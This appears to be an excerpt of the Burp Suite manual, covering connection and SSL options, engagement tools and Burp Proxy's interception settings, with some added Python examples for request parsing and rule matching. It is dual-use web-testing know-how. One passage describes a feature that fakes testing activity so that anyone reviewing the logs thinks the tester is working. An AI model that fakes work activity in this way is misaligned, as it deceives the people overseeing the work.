The options tab contains Suite-wide settings which are not specific to any individual
tools. These are divided into several sub-tabs containing different areas of settings.

Connections tab
This tab contains options controlling how Burp handles network connections, including
authentication, proxy servers, redirections, timeouts and hostname resolution.

These settings control whether Burp Suite should perform authentication to destination
web servers. Different authentication types and credentials can be configured for
individual hosts. Supported types are: basic, NTLMv1, NTLMv2 and digest
authentication. The domain and hostname fields are only used for NTLM authentication.
The "prompt for credentials" option causes an interactive popup to appear whenever an
authentication failure is encountered.

These settings allow you to configure rules specifying different proxy settings for
different (ranges of) destination hosts.
The configuration shown above will make Burp talk directly to
staging.intranet.corp.com, use an internal proxy server without authentication for
everything else on *.intranet.corp.com, and use an authenticated gateway web proxy
for everything else, including the public internet.
You can use standard wildcards in the destination host specification. Rules are applied
in sequence, and the first rule which matches the web server you are communicating
with will be used. If no rule is matched, Burp defaults to direct, non-proxy connections.
For each upstream proxy you configure, you can specify an authentication type and
credentials if required. Supported types are: basic, NTLMv1, NTLMv2 and digest
authentication. The domain and hostname fields are only used for NTLM authentication.

These options let you configure Burp to use a SOCKS proxy for all outgoing
communications.

These settings control what types of redirection Burp will recognise and attempt to
follow where applicable. The redirection targets which Burp will actually follow are still
determined by the configuration within each individual tool (e.g. based on target
scope).

These settings determine timeouts for various network tasks. The "normal" setting is
used for most network communications, and determines how long Burp Suite will wait
before abandoning an individual request and record that a timeout has occurred. The
"read until close" setting is only used where a response is being processed which does
not contain a Content-Length or Transfer-Encoding HTTP header. In this situation, Burp
Suite waits for the specified interval before determining that the transmission has been
completed. The "domain name resolution" setting determines how often Burp Suite will
re-perform successful domain name look-ups. This should be set to a suitably low value
if target host addresses are frequently changing. The "failed domain name resolution"
setting determines how often Burp Suite will reattempt unsuccessful domain name
look-ups.

These settings enable you to specify hostname-to-IP mappings which override the DNS
resolution provided by the operating system. This feature can be used to ensure correct
onward forwarding of requests when the hosts file has been modified to perform
invisible proxying of traffic from non-proxy-aware thick client components.

These options control the handling of HTTP 100 Continue responses from servers. These
often occur when a POST request is sent to the server, and it makes an interim
response before the request body has been transmitted. If "understand 100 Continue
responses" is checked, Burp Suite will skip the interim response and parse the real
response headers for response information like status code and content type. If
"remove 100 Continue headers" is checked, Burp Suite will remove any interim headers
from the server's response before this is passed to individual tools.

Sessions tab
This tab allows you to configure Burp's session handling and macro capabilities. For
more information about making use of these features, see the session handling help.

Display tab
This tab contains options controlling how Burp displays HTTP requests and responses.

These settings control the font which is used to display HTTP messages, and whether
syntax highlighting is performed for requests and responses.

These settings control how Burp handles character sets when displaying HTTP requests
and responses. By default, charsets are automatically recognised and correctly
rendered, per response. This avoids the need to set a specific charset on the command
line when starting Burp, and allows you to work with content that uses multiple
different charsets within the same instance of Burp.

You can override this default behaviour and set a specific charset, or tell Burp to display
raw bytes with no charset handling, in the above options.
Note that some charsets are not supported for all fonts. If you are using a charset that
employs non-Latin glyphs, you should first try using a system font such as Courier New
or Dialog.

Any location where HTTP responses are displayed within Burp Suite it is possible to
render HTML content as it would appear within your browser. This option controls
whether Burp Suite will make any additional HTTP requests that are required to fully
render HTML content (for example, for embedded images). Use of this option involves a
trade-off between the speed and the quality of HTML rendering performed by Burp
Suite.

SSL tab
This tab contains options for how SSL should be used, and information about the SSL
certificates presented by destination servers.

This option enables you to configure a client SSL certificate (in PKCS12 format) which
will be used whenever a destination HTTPS server requires client certificate
authentication. You can also configure Burp to allow unsafe renegotiation, which is
apparently necessary when using some client certificates.

Sometimes, you may have difficulty negotiating SSL connections with certain web
servers. The Java SSL stack contains a few gremlins, and fails to work with certain
unusual server configurations. To help you troubleshoot this problem, Burp lets you
specify which protocols should be offered to servers during SSL negotiations.
Note that Burp itself implements a few workarounds for SSL issues, and if a negotiation
fails with the protocols you have configured, Burp will still try some alternative
combinations of protocols which often work. So you shouldn't use this feature as a
method of testing which protocols are actually supported by the server.
You can also configure Burp to enable all supported cipher suites during SSL
negotiation. This option is not normally necessary but may be useful when attempting
to connect to unusually configured SSL stacks.

This information-only panel contains details of all X509 certificates received from
destination web servers. Double-click an item in the table to display the full details of
the certificate.

Misc tab
This tab contains miscellaneous settings regarding logging, backup, location of
temporary files, and scheduled tasks.

These settings control logging of network requests and responses. Logging can be
configured per-tool or for all Burp Suite traffic.

[Pro version] These settings let you configure Burp to save a backup of all tools' state
and configuration in the background at a configurable interval, and also optionally on
exit. This setting persists across reloads of Burp. So you can configure Burp to always
save its state to a local temp directory, and know that every time you use Burp you will
have a backup copy of your work.

These options let you configure the directory path where Burp saves its temporary files.
This allows you to specify a directory on a different volume, or which is not
world-readable, if required. Changes to this setting take effect the next time Burp starts up.

[Pro version] You can use the task scheduler to automatically start and stop certain
tasks at defined times and intervals. For example, the configuration shown above will
begin scanning a target overnight at 2am, and suspend the scanner each day during
working hours.
You can create tasks via the context menus which appear throughout Burp, or using the
"new task" button in the above panel. This action starts a wizard which lets you
configure the details and timing of the task. Various different types of task are
available:

You can configure each task to be one-off, or to repeat at regular intervals.

Engagement tools
[Pro version] A number of tools exist to help make your work faster and more effective.
These can be accessed via the context menus which appear throughout Burp:

Search
See search help.
Note that if you initiate a search from within the target site map (as opposed to the
Burp menu), then the search will be specific to the selected branch(es) of the site map.

Find comments and scripts


You can use these functions to search part or all of the site map for scripts and
comments. The search results window shows responses from all Burp tools containing
either scripts or comments. Selecting an individual item shows the full request and
response in a preview pane, with relevant items automatically highlighted, and also
extracted into their own tab:

You can use the "export" button to save all of the scripts or comments to file or to the
clipboard, optionally consolidating duplicated items.

Find references
Anywhere you see an HTTP request, URL, domain, etc., you can use the "find
references" function to search all of Burp's tools for HTTP responses which link to that
item. The search results window shows responses from all Burp tools which link to the
selected item. When you view an individual search result, the response is automatically
highlighted to show where the linking reference occurs:

Note that this feature treats the original URL as a prefix when searching for links, so if
you select a host, you will find all references to that host; if you select a folder, you will
find all references to items within that folder or deeper.
The new "find references" feature effectively serves the same purpose as the "linked
from" list that existed in earlier versions of Burp Spider, but is much more powerful.

Analyse target
This function can be used to analyse a target web application and tell you how many
static and dynamic URLs it contains, and how many parameters each URL takes. This
can help you assess how much effort a penetration testing engagement is likely to
involve, and can help you decide where to focus your attention during the test itself.
To access this feature, select one or more hosts or branches within the site map, and
launch it using the context menu. The summarised information looks like this:

And you can drill down into more detail about individual URLs:

You can also export all of this information as an HTML report, which you can attach to
client proposals and reports to show the attack surface you have covered.

Note: (i) This function only analyses the content already captured within the site map,
so you should ensure that you have fully browsed or spidered all of the application's
content and functionality before running it. (ii) URLs are deemed to be "static" if they
do not take any parameters in the URL or message body; however the responses from
these URLs may still be dynamically generated by the application.

Discover content
You can use this function to discover content and functionality which is not linked from
visible content which you can browse to or spider.
Burp uses various techniques to discover content, including name guessing, web
spidering, and extrapolation from naming conventions observed in use within the
application. The feature is highly configurable, as shown by the available options which
are explained below:

Target - These options control which directory to begin discovery from. Only items
within this path and its subdirectories will be requested during the session. You can
choose to discover files or directories or both, and how deep to recurse into discovered
subdirectories.
Test case generation - These options control which file and directory names Burp will
use when making requests to discover content. As well as built-in lists, Burp can
harvest names used elsewhere within an application, and retry them at other locations,
and can construct names based on discovered items, for example by cycling values in
filenames containing numbers.
File extensions - You can specify a list of file extensions with which to test each
possible filename. Burp can harvest file extensions observed in use within the
application, and test these with every filename. When a file has been confirmed, Burp
can also try a specific list of variant extensions with that filename, for example to check
for old or backup versions of the same file.
Discovery engine - You can control how many threads are used for content discovery
and spidering, whether file names are handled case sensitively, and how the discovery
session interacts with Burp's main site map (in the target tab of the suite).
When you have configured your discovery session, you can start it from the control tab,
which also provides runtime information about the actions being performed. The work is
divided into numerous discrete tasks, which are prioritised according to their likelihood
of quickly discovering new content, and new tasks are generated recursively as content
is confirmed:

The discovery session employs its own site map, showing all of the content which has
been discovered within the defined scope. If you have configured Burp to do so, newly
discovered items will also be added to Burp's main site map.

Schedule task
See task scheduler help.

Simulate manual testing


This feature won't exactly enhance your productivity, but you may sometimes find it
useful nonetheless. You can use it to make Burp simulate manual testing activities, by
sending common test payloads to random URLs and parameters within a target
application, at irregular intervals. Burp doesn't do anything with the responses, so you
won't find out about any bugs in this way. But if you think that someone might be
reviewing the application's logs to confirm that you are working, you can use this
feature while you nip out for a long lunch, gym session, drinking binge, or whatever
happens to be your preferred diversion.

Easter Eggs, anyone?

Message editor
Throughout Burp, a custom text editor is used which is optimised for viewing and
editing HTTP requests and responses. Request and response syntax is automatically
colourised to highlight interesting items. Mouse-over pop-ups perform automatic URL
decoding (for requests) and HTML decoding (for responses).
The following shortcut keys are available:

Ctrl + A, select all

Ctrl + X, cut selected text

Ctrl + C, copy selected text

Ctrl + V, paste

Ctrl + F, find and highlight the selected text throughout the message

Ctrl + Z, undo last edit

Ctrl + Y, redo last undone edit

Ctrl + U, URL-encode selected text (hold down Shift to decode)

Ctrl + H, HTML-encode selected text (hold down Shift to decode)

Ctrl + B, Base64-encode selected text (hold down Shift to decode)

Ctrl + left, move to previous word

Ctrl + right, move to next word

Ctrl + up, move to previous paragraph

Ctrl + down, move to next paragraph

Ctrl + home, go to start of message

Ctrl + end, go to end of message

Ctrl + backspace, delete previous word

Ctrl + del, delete next word


Right-clicking on any request or response produces a context menu that can be used to
perform various actions:

send to - You can send any message, or a selected portion of the message, to
other tools within Burp Suite, to perform further attacks or analysis.

show response in browser - You can use this to render the selected response
in your browser, to avoid the limitations of Burp's built-in HTML renderer. When you
select this option, Burp gives you a unique URL which you can paste into your browser
(configured to use the current instance of Burp as its proxy), to render the response.
The resulting browser request is served by Burp with the exact response that you
selected (the request is not forwarded to the original web server), and yet the response
is processed by the browser in the context of the originally requested URL. Hence,
relative links within the response will be handled properly by your browser. As a result,
your browser may make additional requests (for images, CSS, etc.) in the course of
rendering the response - these will be handled by Burp in the usual way.

request in browser - You can use this to re-issue the selected request in your
browser (configured to use the current instance of Burp as its proxy), and optionally reissue the request within the current browser session (i.e. using the cookies supplied by
the browser's cookie JAR). You can use this feature to facilitate testing of access
controls, by selecting requests within Burp that were generated within one user context
(e.g. an administrator), and reissuing the requests within a different user context that
you are now logged in as (e.g. an ordinary user). When you are dealing with complex,
multi-stage processes, this methodology, of manually pasting a series of URLs from
Burp into your browser, is normally a lot easier than repeating a multi-stage process
over and over, and modifying cookies manually using the proxy.

find references - [Pro version] You can use this function to search all of Burp's
tools for HTTP responses which link to the selected item.

discover content - [Pro version] You can use this function to discover content
and functionality which is not linked from visible content which you can browse to or
spider.

schedule task - [Pro version] You can use this function to create tasks which
will run automatically at defined times and intervals.

change request method - For requests, you can automatically switch the
request method between GET and POST, with all relevant request parameters suitably
relocated within the request. This option can be used to quickly test the application's
tolerance of parameter location in potentially malicious requests (e.g. cross-site
scripting).

change body encoding - For requests, you can switch the encoding of any
message body between application/x-www-form-urlencoded and multipart/form-data.

copy URL - This function copies the full current URL to the clipboard.

copy to file - This function allows you to select a file and copy the contents of
the message to the file. This is handy for binary content, when copying via the
clipboard may cause problems. Copying operates on the selected text or, if nothing is
selected, the whole message.

paste from file - This function allows you to select a file and paste the contents
of the file into the message. This is handy for binary content, when pasting via the
clipboard may cause problems. Pasting replaces the selected text or, if nothing is
selected, inserts at the cursor position.

save item - This function lets you specify a file to save the selected request and
response in XML format, including all relevant metadata such as response length, HTTP
status code and MIME type.

convert selection - These functions enable you to perform quick encoding or
decoding of the selected text in a variety of schemes.

URL-encode as you type - If this option is turned on then characters like & and
= will be automatically replaced with their URL-encoded equivalents as you type.

Extensibility
Burp Suite is extensible via the IBurpExtender interface. This allows third-party
developers to extend the functionality of Burp by creating implementations of the
interface which will be dynamically loaded and executed. Extensions can perform a wide
range of functions, including processing and modifying HTTP requests made via all Burp
tools, issuing arbitrary HTTP requests via Burp, extending Burp's UI with custom menu
items, querying and modifying Burp's configuration data, and accessing key runtime
information, including the Proxy history, site map and Scanner issues. See the source
code and Javadoc for the interface for more details.

I think if you have gone through the manual you are ready to hack. But
wait, there is so much more to offer.

What is Burp Proxy?


Burp Proxy is an interactive HTTP/S proxy server for attacking and debugging web
applications. It operates as a man-in-the-middle between the end browser and the
target web server, and allows the user to intercept, inspect and modify the raw traffic
passing in both directions.
Burp Proxy allows you to find and exploit application vulnerabilities by monitoring and
manipulating critical parameters and other data transmitted by the application. By
modifying browser requests in various malicious ways, Burp Proxy can be used to
perform attacks such as SQL injection, cookie subversion, privilege escalation, session
hijacking, directory traversal and buffer overflows. Intercepted traffic can be modified
as raw text, as a table of parameters or headers, or in hexadecimal form, so even
transfers of binary data can be manipulated. Response messages containing HTML or
image data can be rendered within Burp Proxy.
In addition to per-request manipulation, Burp Proxy maintains a complete history of
every request sent by the browser, all modifications made, and all responses received.
You can review earlier requests, and reissue and re-modify any individual request, and
view saved responses in raw form or rendered as web pages. The entire conversation in
both directions can also be logged to file for further analysis or to provide an audit trail.
Burp Proxy is tightly integrated with the other tools within Burp Suite, and allows any
request or response to be sent to other tools for further processing. With a single click,
you can send an interesting request to be used as the basis for session token analysis,
manual modification and reissue, vulnerability analysis, or a custom automated attack
using Burp Intruder.
The interactive behaviour of Burp Proxy can be controlled using fine-grained rules for
requests and responses, based on domain, IP address, protocol, HTTP method, URL,
resource type, parameters, cookies, header/body content, response code, content type
and HTML page title. It can be configured to operate quietly without any per-request
interaction. You can later review the history to identify requests that bear closer
examination. Burp Proxy can be used to automate modification of HTTP request and
response messages, through the use of regex-based match and replace rules.
In addition to the main user interface, Burp Proxy can also be controlled from within the
end browser, for reviewing the request history and reissuing individual requests.

Burp Proxy can be used in conjunction with an upstream proxy server. It can handle
basic, NTLM and digest authentication to the upstream proxy and to web servers, and
so can be used in almost any LAN environment. It supports SSL (with the ability to
configure custom server or client certificates), and allows HTTPS traffic to be viewed
and modified as clear-text. In addition, it automatically handles various encodings of
server responses, including chunked transfer-encoding and compressed content-encoding.

Using Burp Proxy


When Burp Proxy is launched, the HTTP/S proxy service is started automatically on port
8080 of the loopback interface only. To start using Burp Proxy, simply configure your
browser to use a proxy server on 127.0.0.1:8080, and begin browsing.
By default, Burp Proxy is configured to intercept requests for non-media resources, and
display these for inspection and modification. Other requests (for images and
stylesheets) and all server responses are automatically forwarded. This default
behaviour can be modified (see Options tab).

Intercept tab
This tab is used to display and modify individual browser requests and server
responses.
The top of the display indicates whether the HTTP message shown is a request or
response, and the hostname and IP address of the target server. When you have
reviewed and (if required) edited the message, click "forward" to send it on to the
server or browser. Click "drop" to abandon the message.

You can also forward or drop the message using the shortcut keys Alt-F and Alt-D.
Each request and response message can be displayed and analysed in various forms, by
clicking on one of the available display tabs. The available tabs will appear and
disappear as appropriate for the type of message being displayed:

raw - This displays the message in plain text form. At the bottom of the text
pane is a search and highlight function which can be used to quickly locate interesting
strings within the message, such as error messages. An options pop-up on the left of
the search bar lets you control case sensitivity, and whether to use simple text or regex
search.

params - For requests containing parameters (within the URL query string, the
Cookie header, or the message body), this tab analyses the parameters into
name/value pairs and allows these to be easily viewed and modified.

headers - This shows the HTTP headers of the message as name/value pairs,
and also displays any message body in raw form.

hex - This allows direct editing of the raw binary data that make up the
message. Certain types of traffic (e.g. browser requests with MIME-encoded parts)
contain binary content that may be corrupted if modified in the text editor. To modify
this type of message, the hex editor should be used.

HTML / XML - For responses containing content in these formats, this provides
a syntax-colourised view of the message body.

render - For responses containing HTML or image content, this renders the
content in visual form, as it would appear within your browser.

AMF - For requests and responses in Action Message Format, this displays a tree
view of the decoded message. If editable, you can double-click individual nodes in the
tree to modify their values.

viewstate - For requests and responses containing an ASP.NET ViewState
parameter, this deserialises the contents of the ViewState, enabling you to review the
data contained for any sensitive items. It also indicates whether the ViewState MAC
option is enabled (and therefore whether the ViewState can be modified).
Right-clicking on any of the display tabs produces a context menu that can be used to
perform various actions. The same menu can also be accessed via the "action" button
on the main display:

send to - You can send any message, or a selected portion of the message, to
other tools within Burp Suite, to perform further attacks or analysis.

find references - [Pro version] You can use this function to search all of Burp's
tools for HTTP responses which link to the selected item.

discover content - [Pro version] You can use this function to discover content
and functionality which is not linked from visible content which you can browse to or
spider.

schedule task - [Pro version] You can use this function to create tasks which
will run automatically at defined times and intervals.

change request method - For requests, you can automatically switch the
request method between GET and POST, with all relevant request parameters suitably
relocated within the request. This option can be used to quickly test the application's
tolerance of parameter location in potentially malicious requests (e.g. cross-site
scripting).

change body encoding - For requests, you can switch the encoding of any
message body between application/x-www-form-urlencoded and multipart/form-data.

copy URL - This function copies the full current URL to the clipboard.

copy to file - This function allows you to select a file and copy the contents of
the message to the file. This is handy for binary content, when copying via the
clipboard may cause problems. Copying operates on the selected text or, if nothing is
selected, the whole message.

paste from file - This function allows you to select a file and paste the contents
of the file into the message. This is handy for binary content, when pasting via the
clipboard may cause problems. Pasting replaces the selected text or, if nothing is
selected, inserts at the cursor position.

save item - This function lets you specify a file to save the selected request and
response in XML format, including all relevant metadata such as response length, HTTP
status code and MIME type.

don't intercept - These commands allow the quick addition of interception rules
(see Options tab) to prevent interception of messages which share features of the
currently displayed message (e.g. remote host, resource type, response code).

do intercept - Available for requests only, this allows you to force interception
for the response to the currently displayed request.

convert selection - These functions enable you to perform quick encoding or
decoding of the selected text in a variety of schemes.

URL-encode as you type - If this option is turned on then characters like & and
= will be automatically replaced with their URL-encoded equivalents as you type.
The intercept tab contains a toggle button which can be used to quickly turn
interception mode on and off. If this is showing "intercept is on" then messages will be
intercepted or automatically forwarded according to the interception rules configured on
the Options tab. If this is showing "intercept is off" then no messages will be
intercepted.

Options tab
This tab contains various configuration options which control the behaviour of Burp
Proxy, as described below.

Burp Proxy allows you to define multiple listeners. Each listener opens a port on your
computer and waits for connections from your browser. By default, Burp opens a single
listener on port 8080 of the loopback interface, but you can modify this listener and add
as many others as you require. For each listener, you can configure a number of
properties, as described below.
local listener port - This is the port on the local computer which will be opened to
listen for incoming connections. You should configure your browser settings to use the
host 127.0.0.1 and this port as its proxy server.
listen on loopback interface only - This controls whether the listener binds only to
the loopback interface (127.0.0.1) or to all network interfaces. Note: if this option is
deselected then other computers may be able to connect to the listener. This may
enable them to initiate outbound connections originating from your IP address, and to
access the contents of the proxy history, which may contain sensitive data such as login
credentials. You should only deselect this option when you are located on a trusted
network.
support invisible proxying for non-proxy-aware clients - If you are using a
standard browser, you should leave this option unchecked. The option is sometimes
useful if the application you are targeting employs a thick client component which runs
outside of the browser, or which makes its own HTTP requests outside of the browser's
framework. Often, these clients don't support HTTP proxies, or don't provide an easy
way to configure them to use one. In this situation, you can effectively force the client
to connect to Burp by redirecting the client's requests lower down the networking stack
- e.g. by adding an entry to your hosts file, or changing your routing configuration.
However, the requests issued by the client will probably not be in the style normally
used with web proxies.
A proxy-style request looks like this:
GET http://myapp.com/foo.php HTTP/1.1
Host: myapp.com
whereas the corresponding non-proxy request looks like this:
GET /foo.php HTTP/1.1
Host: myapp.com
Normally, web proxies need to receive the full URL in the first line of the request in
order to determine which destination host to forward the request to (they do not, if
they follow the spec, look at the Host header to determine the destination). To enable
Burp Proxy to work with clients that send non-proxy-style requests, you need to check
the "support invisible proxying" option. When you do this, if Burp receives any non-proxy-style requests, it will parse out the contents of the Host header, and use that
as the destination host for that request.
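The distinction between proxy-style and non-proxy-style requests, and the Host header fallback that "invisible proxying" relies on, is easy to see in code. The following is an added example written for this section, not Burp's own implementation; the request bytes it works on are constructed, and the `resolve_destination` and `parse_request_head` names are my own.

```python
"""Destination resolution for proxy-style and non-proxy-style requests, as an
added example of the distinction drawn above (not Burp's code). A proxy-style
request line carries the absolute URL; a non-proxy-style request, such as one
from a thick client redirected to the listener via the hosts file, carries
only a path, so in "invisible proxying" mode the destination is recovered from
the Host header instead. All request text is constructed.
"""
from urllib.parse import urlsplit


def parse_request_head(raw: bytes):
    """Return (method, request_target, version, headers) for one HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def resolve_destination(raw: bytes, invisible: bool = False):
    """Return (host, port, style); style records which form of request was seen."""
    method, target, _version, headers = parse_request_head(raw)
    if method == "CONNECT":
        # Browsers tunnel HTTPS through a proxy with "CONNECT host:port".
        host, _, port = target.partition(":")
        return host, int(port or 443), "connect"
    if target.startswith(("http://", "https://")):
        parts = urlsplit(target)       # proxy-style: full URL on the request line
        port = parts.port or (443 if parts.scheme == "https" else 80)
        return parts.hostname, port, "proxy"
    # Non-proxy-style: the request line has only a path such as /foo.php.
    if not invisible:
        raise ValueError("non-proxy-style request received with invisible proxying disabled")
    host_header = headers.get("host")
    if not host_header:
        raise ValueError("non-proxy-style request without a Host header")
    host, _, port = host_header.partition(":")
    return host, int(port or 80), "invisible"


if __name__ == "__main__":
    # Constructed samples: the two request forms shown in the text above.
    proxy_style = b"GET http://myapp.com/foo.php HTTP/1.1\r\nHost: myapp.com\r\n\r\n"
    plain_style = b"GET /foo.php HTTP/1.1\r\nHost: myapp.com\r\n\r\n"
    print(resolve_destination(proxy_style))
    print(resolve_destination(plain_style, invisible=True))
```

With invisible proxying off, the plain request raises instead of being forwarded anywhere, which is the behaviour a spec-following proxy exhibits: it has no destination to use. Only when the option is on does the Host header decide where the request goes, which is also why a redirected client that sends a wrong or missing Host header cannot be proxied this way.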
redirect to host/port - You should normally leave these options blank. If they are
configured, Burp Proxy will forward every request to the host and port specified,
regardless of the target requested by the browser. Note that if you are using this
option, it may be necessary to configure a match/replace rule to rewrite the Host
header in requests, if the server to which you are redirecting requests expects a Host
header that differs from the one sent by the browser.
server SSL certificate - This option lets you configure the server SSL certificates that
are presented to your browser. Correct use of these options can resolve some SSL
issues that arise when using an intercepting proxy. See the server SSL certificates
help for full details of how to use these options.
Note: By default, upon installation, Burp creates a unique, self-signed CA certificate,
and stores this on your computer to use every time Burp is run. Each time you connect
to an SSL-protected website, Burp generates a server certificate for that host, signed by
the CA certificate. To make most effective use of this feature, you can install Burp's CA
certificate as a trusted root in your browser (see instructions), so that the per-host
certificates are accepted without any alerts.
Sometimes, you may wish to create a custom SSL certificate to use within Burp. You
can use the following commands in OpenSSL to create a custom certificate (called
"foo.crt") with a name of your choosing:
openssl genrsa 1024 > foo.key
openssl req -new -x509 -nodes -sha1 -days 7300 -key foo.key > foo.crt
openssl pkcs12 -export -out foo.p12 -in foo.crt -inkey foo.key -name "your name"
Note that the 1024-bit key and SHA-1 signature in these commands reflect the age of the
original text and are weak by today's standards; use at least a 2048-bit RSA key and
-sha256 instead.

These panels allow fine grained interception rules to be configured governing the
interception of requests and responses. The "intercept if" checkboxes control whether
any requests and responses at all are intercepted. If one or both of these boxes are
checked, then the relevant messages will be intercepted according to the active rules in
the table. Individual rules can be activated or deactivated with the checkbox on the left
of each rule. Rules can be edited, removed, added or relocated using the buttons on the
right.
Rules can be configured on practically any attribute of the message, including domain
name, IP address, protocol, HTTP method, URL, resource type, parameters, cookies,
header/body content, response code, content type and HTML page title. You can
configure rules to only intercept items for URLs that are within the target scope.
Regular expressions can be used to define complex matching conditions for each
attribute. Rules are combined using the Boolean operators AND and OR. These are
processed with a simple "left to right" logic in which the scope of each operator is as
follows:
(cumulative result of all prior rules) AND/OR (result of current rule)
All active rules are processed on every message, and the result after the final active
rule is applied determines whether the message is intercepted or forwarded in the
background.
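The "left to right" combination rule matters because it is not the AND-before-OR precedence most people expect from Boolean expressions. The following added example, not Burp's code, models a rule table and evaluates it exactly as the paragraph above describes; the `Rule` fields, the attribute names (`extension`, `has_params`, `in_scope`) and the sample rule table are constructed for illustration, as is the assumption that an empty rule table holds every message.

```python
"""Interception rule evaluation with the "left to right" combining logic the
text describes: (cumulative result of all prior rules) AND/OR (result of the
current rule), with no operator precedence. Added example, not Burp's code;
the rule attributes, the sample rule table and the sample messages are all
constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class Rule:
    enabled: bool          # the checkbox on the left of each rule
    op: str                # "AND" or "OR": how this rule joins the cumulative result
    attribute: str         # message attribute to test, e.g. "method", "extension", "host"
    pattern: str           # regular expression applied to that attribute's value
    negate: bool = False   # True means "does not match"


def rule_matches(rule: Rule, message: dict) -> bool:
    value = str(message.get(rule.attribute, ""))
    hit = re.search(rule.pattern, value) is not None
    return (not hit) if rule.negate else hit


def should_intercept(rules, message: dict, intercept_if: bool = True) -> bool:
    """Decide whether a message is held for the user or forwarded in the background."""
    if not intercept_if:
        return False                       # master "intercept if" box unchecked
    active = [r for r in rules if r.enabled]
    if not active:
        return True                        # assumption: no active rules means hold everything
    result = rule_matches(active[0], message)   # the first active rule's operator is irrelevant
    for rule in active[1:]:
        current = rule_matches(rule, message)
        result = (result and current) if rule.op == "AND" else (result or current)
    return result


# A rule table loosely modelled on the default behaviour mentioned above
# (intercept non-media resources), constructed for this example.
SAMPLE_RULES = [
    Rule(True,  "OR",  "extension",  r"^(gif|jpg|png|css|js|ico)$", negate=True),
    Rule(True,  "OR",  "has_params", r"^True$"),
    Rule(False, "AND", "in_scope",   r"^True$"),
]


def with_scope_rule(rules):
    """Return a copy of the rule table with the scope rule switched on."""
    return [Rule(True, r.op, r.attribute, r.pattern, r.negate)
            if r.attribute == "in_scope" else r for r in rules]


if __name__ == "__main__":
    # Constructed messages: a stylesheet and a dynamic page, both out of scope.
    css = {"extension": "css", "has_params": False, "in_scope": False}
    php = {"extension": "php", "has_params": False, "in_scope": False}
    print(should_intercept(SAMPLE_RULES, css), should_intercept(SAMPLE_RULES, php))
    print(should_intercept(with_scope_rule(SAMPLE_RULES), php))
```

With the scope rule switched on, the out-of-scope `php` request evaluates as `(True OR False) AND False`, which is `False`, so it is forwarded silently; under conventional precedence the same table would read `True OR (False AND False)` and hold the request. When a rule table does not behave as you expect, walk it from the top exactly as this loop does.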
The "update Content-Length" checkboxes control whether Burp Proxy automatically
updates the Content-Length header of requests and responses when these have been
modified by the user. If checked, Burp Proxy will recalculate the length of the HTTP
body of the modified message, and set the correct value in the HTTP header. This
feature is normally essential when the HTTP body has been modified. The HTTP
specification, and most web servers, require the correct value for the length of the HTTP
body to be submitted in the Content-Length header. If the correct value is not specified,
then the server or browser receiving the message may generate an error, process an
incomplete message, or may wait indefinitely for further data to be received.

You can use these options to achieve various tasks by automatically rewriting the HTML
in application responses. Unhiding hidden fields enables you to edit their values directly
in the browser, rather than by intercepting subsequent requests. Similarly with enabling
disabled fields, and removing length limitations. Disabling JavaScript and OBJECT tags
provides a quick way to disable any client-side logic for testing purposes. (Note that this
feature is not designed to be used as a security defence in the manner of NoScript.)

match and replace - These options configure Burp Proxy to perform regex-based
pattern matching and replacement on HTTP request and response headers and body.
For each rule selected, a regular expression is used to test the header or body for
matches, and any matching parts are replaced with the specified string.
For message headers, if the test matches the entire header and the replacement string
is left blank, then the header is deleted. If a blank matching expression is specified,
then the replacement string will be added as a new header. This feature is useful to
automate certain application attacks, such as manipulation of cookies or URL query
string fields.
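Two of the proxy behaviours described above, header match/replace rules and automatic Content-Length maintenance, fit together naturally: a rewrite that touches the body invalidates the length header, and a rewrite that deletes or adds headers must leave the message well-formed. The following is an added example written for this section, not Burp's code. It implements the three rule semantics exactly as the text states them (entire-header match with a blank replacement deletes; blank match adds the replacement as a new header; otherwise matching parts are substituted) and then recomputes Content-Length. The sample message and the rule list are constructed.

```python
"""Header match/replace and Content-Length maintenance, as an added example of
the two proxy behaviours described above (not Burp's code). Rule semantics
follow the text: a regex that matches the entire header with an empty
replacement deletes that header; an empty match expression adds the
replacement as a new header; otherwise matching parts are substituted.
Sample messages and rules are constructed.
"""
import re

CRLF = b"\r\n"


def split_message(raw: bytes):
    """Split an HTTP message into (start_line, [header lines], body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    return lines[0], lines[1:], body


def join_message(start_line: bytes, headers, body: bytes) -> bytes:
    return CRLF.join([start_line, *headers]) + CRLF + CRLF + body


def apply_header_rules(headers, rules):
    """rules: list of (match_regex, replacement) pairs applied to header lines in order."""
    out = list(headers)
    for match, replacement in rules:
        if match == "":
            out.append(replacement.encode("iso-8859-1"))   # blank match: add a new header
            continue
        rx = re.compile(match)
        kept = []
        for header in out:
            text = header.decode("iso-8859-1")
            if replacement == "" and rx.fullmatch(text):
                continue                                  # whole header matched: delete it
            kept.append(rx.sub(replacement, text).encode("iso-8859-1"))
        out = kept
    return out


def update_content_length(headers, body: bytes):
    """Recalculate Content-Length so the receiver does not read a truncated body or hang."""
    length = str(len(body)).encode()
    out, seen = [], False
    for header in headers:
        if header.lower().startswith(b"content-length:"):
            out.append(b"Content-Length: " + length)
            seen = True
        else:
            out.append(header)
    if not seen and body:
        out.append(b"Content-Length: " + length)          # body present but no header
    return out


def rewrite_message(raw: bytes, header_rules, new_body: bytes = None) -> bytes:
    start, headers, body = split_message(raw)
    headers = apply_header_rules(headers, header_rules)
    if new_body is not None:
        body = new_body                                   # user edited the body
    headers = update_content_length(headers, body)
    return join_message(start, headers, body)


# Constructed sample request and rule table.
SAMPLE_REQUEST = (b"POST /login HTTP/1.1\r\nHost: myapp.com\r\nCookie: session=abc123\r\n"
                  b"X-Debug: 1\r\nContent-Length: 8\r\n\r\nuser=bob")
SAMPLE_RULES = [
    (r"^X-Debug:.*$", ""),                 # delete the debug header outright
    ("", "X-Test-Run: 1"),                 # add a marker header to every request
    (r"session=\w+", "session=REDACTED"),  # rewrite only the matching part of the Cookie header
]

if __name__ == "__main__":
    print(rewrite_message(SAMPLE_REQUEST, SAMPLE_RULES, b"user=bob&role=user").decode())
```

Rules are applied in table order, so a header added by an earlier rule is visible to later ones, and the length header is always fixed up last. The `update_content_length` step is what the "update Content-Length" checkbox automates; without it the edited request above would announce 8 bytes while carrying 18, and the server would either process a truncated parameter set or wait for data that never arrives.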

